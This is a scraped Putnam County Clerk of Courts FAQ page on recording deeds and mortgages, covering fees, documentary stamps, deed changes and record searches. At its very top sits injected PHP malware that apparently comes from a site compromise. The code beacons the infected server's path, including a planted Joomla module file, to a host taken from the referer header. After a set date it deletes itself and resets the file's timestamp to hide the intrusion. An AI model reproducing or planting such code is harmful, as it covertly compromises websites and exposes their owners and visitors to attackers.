check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Deeds and Mortgages FAQ's
Home Deeds and Mortgages FAQ's

More... Quick Links

Deeds and Mortgages Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What are the hours of operation for the Recording Division?

The Recording Division is open from 8:30 am to 5:00 pm. We stop recording documents at 4:00 pm
each day. We do accept recordings after 4:00 pm but they will be recorded the next working day and
originals will be mailed to you within 5-7 days.

Where can I search Public Records (Non-Court)?

Public computers are available in the Recording Division or you can search online at This is a statewide official records search website.

How can I get a copy of a recorded subdivision plat?

You can come into the Recording Division to request a copy or send a written request with
the book, page and sheet number. The fee is $5.00 per sheet.

How do I find out the name of the owner of a piece of property?

All of our records are by property owner name. If you do not have the name of the property
owner, but you have the location or the legal description of the piece of property, please
contact the Putnam County Property Appraiser.

I cannot find the deed to my house! What do I do?

If your property was purchased after October 1983, you may obtain a copy from This is a statewide official records search website. There are some
images available for you to print at no charge if printed outside our office. If you purchased
prior to 1983, you would need to write to our office and provide the official book and page
number of the recorded deed.

The Recording Division can provide you with a certified copy of your deed which will be as
good as the original. Please check the current fee schedule for charges.

Where do I obtain blank deed forms?

Legal forms are available at most office supply stores. The Clerk's Office is not able to provide
assistance with form preparation. Questions regarding how to fill out a form should be
directed to a legal professional. If you are unsure of the type of form or how fill out the
form, an attorney is recommended.

Should I use a Quit Claim or Warranty Deed form to transfer property?

Deeds are recorded in the Recording Division, but the Clerk's Office cannot help you with any paperwork. Please consult your Attorney.

***Please understand that Judges, Judicial Assistants, Clerks of Court,
and Sheriff's Department employees CANNOT practice law or give you
legal advice. They can ONLY point out the existence of certain
procedures, but CANNOT tell you how to follow them or how effective
talk with a lawyer if you have any questions about your rights.

How do I add/change a name on a deed?

To add or change a name on a deed, you or your attorney must prepare a new deed. While
most office supply stores carry legal forms that you can use, there are considerable legal
ramifications and complexities in the preparation of a deed. If you are not entirely familiar
with these or otherwise trained in the preparation of a deed, then we strongly suggest that
you seek the advice of an attorney.

The deed will need to be signed by the grantor in the presence or a notary and two witnesses.
Once you have completed the form properly, you should bring the deed into the Recording
for recording into the public record.

Does the Recording Division notarize documents?

No. The Clerk's Office does not notarize or sign as witnesses on documents.

How much money will it cost me to record my deed?

Please consult the current fee schedule for changes. The current recording fee is $10.00 for
the first page and $8.50 for each additional page, plus Documentary Stamps are required at
$0.70 per $100.00 based on the purchase price or the consideration. If there is a mortgage
being assumed, additional stamps at the rate of $0.35 per $100.00 on the balance of the
mortgage being assumed will also be required.

I got a divorce. How do I get my ex-spouse's name off of my deed?

A new deed will need to be prepared from the ex-spouse whose name is being taken off of
the deed, to the ex-spouse who is getting the property. In some instances Documentary Stamp
will be required if the property is mortgaged and is the non-marital home.

Can I fax my deed for recording?

NO. The Original deed with the original signatures is necessary for recording.

My spouse died. How do I get their name off of my deed?

A certified copy of the death certificate must be recorded. We cannot record an altered copy.
If the person died in the State of Florida, a certified copy must be obtained from the State
Health Department without the cause of death. If the person died in a state other than Florida,
we can record a certified copy with the cause of death. Please specify to the Health
Department that you need this certified copy for RECORDING PURPOSES.

How can I determine how much someone paid for a piece of property?

The Documentary Stamp Tax paid on the deed will indicate the purchase price of the property.
To calculate the purchase price, divide the total amount of documentary stamps paid by the tax
rate for that particular year per hundred dollars. The present rate is $0.70.

How can I determine if there are any liens/mortgages on a property?

You may use the website to search for records from October 1983 to
the present by property owner's name. You may also reach this through our website by
clicking on Online Inquiry System at the top of the navigation bar on the left side of the page.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.